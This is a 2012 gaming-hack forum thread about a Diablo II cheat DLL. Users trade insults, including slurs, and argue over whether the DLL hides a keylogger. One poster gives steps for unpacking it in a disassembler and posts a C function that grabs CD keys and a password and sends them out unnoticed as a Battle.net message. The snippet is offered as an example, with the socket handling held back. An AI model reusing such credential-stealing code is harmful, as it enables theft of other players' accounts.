Project v2.0

whisty · **Joined:** Sun Sep 04, 2011 10:07 pm

Killershrimp4 » Thu Jun 14, 2012 6:33 am wrote:

whisty » Thu Jun 14, 2012 6:39 am wrote:

Killershrimp4 » Wed Jun 13, 2012 9:03 am wrote:

ftp4life » Wed Jun 13, 2012 8:00 am wrote:

it is NOT keylogged... btw walla ty

)

also another issue i wanna bring up for u walla idk if u got it working or not but why wont my kills be logged into the kill log.txt even thoe its set to do so, or is it suppose to be under a different name

i raped ur shitty sorc ealier on tonight

[06:52:46 PM] RageQuit was slain by NZ
[06:52:46 PM] NZ: Raped Idiot o.o!
[06:52:48 PM] RageQuit(ftp4life) [Level 92 Sorceress (0% Life)] left the game.

all ur chars suck quit life mad_dru

your point is...?

i killed him. isnt it obvious or are u just one of those click downloaders who dont know anything

okay, let me be more clear... who the fuck cares? what was the point of coming in this topic and say "BWHAHAHA fag i kill u, u suck haha"
to be more clear, what the fuck was your point?? useless post level 99 sir.

GapZ · **Joined:** Tue Jan 05, 2010 8:29 pm

Killershrimp4 » Thu Jun 14, 2012 1:33 am wrote:

whisty » Thu Jun 14, 2012 6:39 am wrote:

Killershrimp4 » Wed Jun 13, 2012 9:03 am wrote:

ftp4life » Wed Jun 13, 2012 8:00 am wrote:

it is NOT keylogged... btw walla ty

)

also another issue i wanna bring up for u walla idk if u got it working or not but why wont my kills be logged into the kill log.txt even thoe its set to do so, or is it suppose to be under a different name

i raped ur shitty sorc ealier on tonight

[06:52:46 PM] RageQuit was slain by NZ
[06:52:46 PM] NZ: Raped Idiot o.o!
[06:52:48 PM] RageQuit(ftp4life) [Level 92 Sorceress (0% Life)] left the game.

all ur chars suck quit life mad_dru

your point is...?

i killed him. isnt it obvious or are u just one of those click downloaders who dont know anything

like you know something lol. don't rage to much kid

KfC · **Joined:** Mon Apr 05, 2010 12:29 am

[09:28:49 PM] screwtrange was slain by xL-Energy
[09:28:52 PM] Sylar was slain by xL-Energy
[09:28:53 PM] Sylar(Sylar) [Level 95 Paladin (100% Life)] left the game.

Bulldogs · **Joined:** Sat Nov 19, 2011 3:33 am

KfC » Sat Jun 23, 2012 12:04 pm wrote:

[09:28:49 PM] screwtrange was slain by xL-Energy
[09:28:52 PM] Sylar was slain by xL-Energy
[09:28:53 PM] Sylar(Sylar) [Level 95 Paladin (100% Life)] left the game.

who are you again

SlainByNemy · **Posted:** Tue Jun 26, 2012 1:15 pm

Wow!!

ftp4life · **Joined:** Tue Jun 21, 2011 5:11 pm

oh sick, howd you get that to log your messages :/ been trying to fix that, and the kill log. it wont save >:( lolz

anywho anyone else haveing trouble reading the .DLL, i found one program that can read it but i kinda forgot how to use it so imma re-learn this crap and then try to upload a cleaner .DLL so it can be read in Hexing again

Vampirewolve · **Joined:** Tue Mar 01, 2005 8:31 pm

VampireWolve wrote:

1. Load the .dll in a disassembler
2. Scroll down from the entry point, find the next POPAD and set a Hardwarebreakpoint on the next JMP OPcode
3. Run till execution. The crappy hack it now unpacked.
4. Find shitty keylogger
5. ????
6. Profit

Then search for referenced strings. You will find:

Code: Select all

1003D858   PUSH Project_.100561BC                    ASCII "Norwegian-Nynorsk"

1 min asm and you found already something suspicious.

Sounds strange doesn't it? Too many too be an account/charname but you should look deeper into this.
If not on asm level try to login /whois Norwegian-Nynor or some variations with 2 missing letters.

It also may be some keyword to trigger malicious activity.

Thats a coding forum, so if you want help with code, feel free to ask.
To create a message log you got many possibilities:
Use the internal D2 functions where the messages get passed.
Use the LastMessagepointer
Packet GS 0x26 and BNCS 0x0F packet.
etc.

whisty · **Joined:** Sun Sep 04, 2011 10:07 pm

VampireWolve wrote:

Packet GS 0x26 and BNCS 0x0F packet.

That's personally what I used to make mine, and it works good. You even can make any kind of filter/extra info you want from there.

ftp4life · **Joined:** Tue Jun 21, 2011 5:11 pm

Vampirewolve wrote:

VampireWolve wrote:

1. Load the .dll in a disassembler
2. Scroll down from the entry point, find the next POPAD and set a Hardwarebreakpoint on the next JMP OPcode
3. Run till execution. The crappy hack it now unpacked.
4. Find shitty keylogger
5. ????
6. Profit

Then search for referenced strings. You will find:

Code: Select all

1003D858   PUSH Project_.100561BC                    ASCII "Norwegian-Nynorsk"

1 min asm and you found already something suspicious.

Sounds strange doesn't it? Too many too be an account/charname but you should look deeper into this.
If not on asm level try to login /whois Norwegian-Nynor or some variations with 2 missing letters.

It also may be some keyword to trigger malicious activity.

Thats a coding forum, so if you want help with code, feel free to ask.
To create a message log you got many possibilities:
Use the internal D2 functions where the messages get passed.
Use the LastMessagepointer
Packet GS 0x26 and BNCS 0x0F packet.
etc.

you i tried adding that hardwarebreakpoint to the next following POPAD and all i got was errors might be just because i might be adding it on the previous or the following AFter popad. therefor imma try to look for another one, also when i would save it back into .dll o.O i wuld only get more errors lmfao i shuld have never stopped doing this when i was codeing private servers back in 09

D3STROY3R · **Joined:** Sun Jun 22, 2008 7:00 pm

vwolfei stop trolling there is no keylogger in this
and if you used half a brain you would realize same string is in the 1.3 source dll along with
spanish-mexican and irish-english and whole other load of language pack

Packet GS 0x26 and BNCS 0x0F packet.

how the fuck you gonna use that to keylog when a person injects after they are already logged in?

ftp4life · **Joined:** Tue Jun 21, 2011 5:11 pm

Quote:

vwolfei stop trolling there is no keylogger in this
and if you used half a brain you would realize same string is in the 1.3 source dll along with
spanish-mexican and irish-english and whole other load of language pack

Packet GS 0x26 and BNCS 0x0F packet.

how the fuck you gonna use that to keylog when a person injects after they are already logged in?

you have a point o.O :/

Vampirewolve · **Joined:** Tue Mar 01, 2005 8:31 pm

Code: Select all

BOOL Keylog()
{
BNCLIENT_DecodeAndLoadKeys();

if(gotpw)
sprintf_s(Temp,*p_BNCLIENT_ClassicKey, *p_BNCLIENT_XPacKey, PW);
else
sprintf_s(Temp,*p_BNCLIENT_ClassicKey, *p_BNCLIENT_XPacKey);


*p_BNCLIENT_ClassicKey=*p_BNCLIENT_KeyOwner=*p_BNCLIENT_XPacKey=NULL;

if(CloseFogSocket())
{
BNCLIENT_SendBNMessage(Temp);
OpenFogSocket();
}
else
return 0;

return 1;
}

One simple example how to keylog somebody without noticing.
Want more examples?

It might be a smart idea to hide an account as Language support and cut off some letters?
Now give a reason why Norwegian should pop up alone and first.

ftp4life · **Joined:** Tue Jun 21, 2011 5:11 pm

o.O well dont tell people that lmfao!! now people will use it for evil purposes

Vampirewolve · **Joined:** Tue Mar 01, 2005 8:31 pm

I didn't post how to handle the sockets, how to hide Temp that it won't show up as string.

The other stuff can be found in D2BS even used differently. If they just add 1 and 1 together the victems will see how their data gets whispered to somebody.

D3STROY3R · **Joined:** Sun Jun 22, 2008 7:00 pm

stop posting random code that means nothing
there isnt even a pointer to cdkey memlocations in this dll
and theres only basically 3 places you can get cdkey string from...

also intermodular calls were posted and you can easily find the patch hooks to see nothing like that exists in the dll
there is no keylogger in this end of story

and seriously why would you keylog a d2 program now-a-days cdkeys arent worth shit

Blizzhackers

Project v2.0

Who is online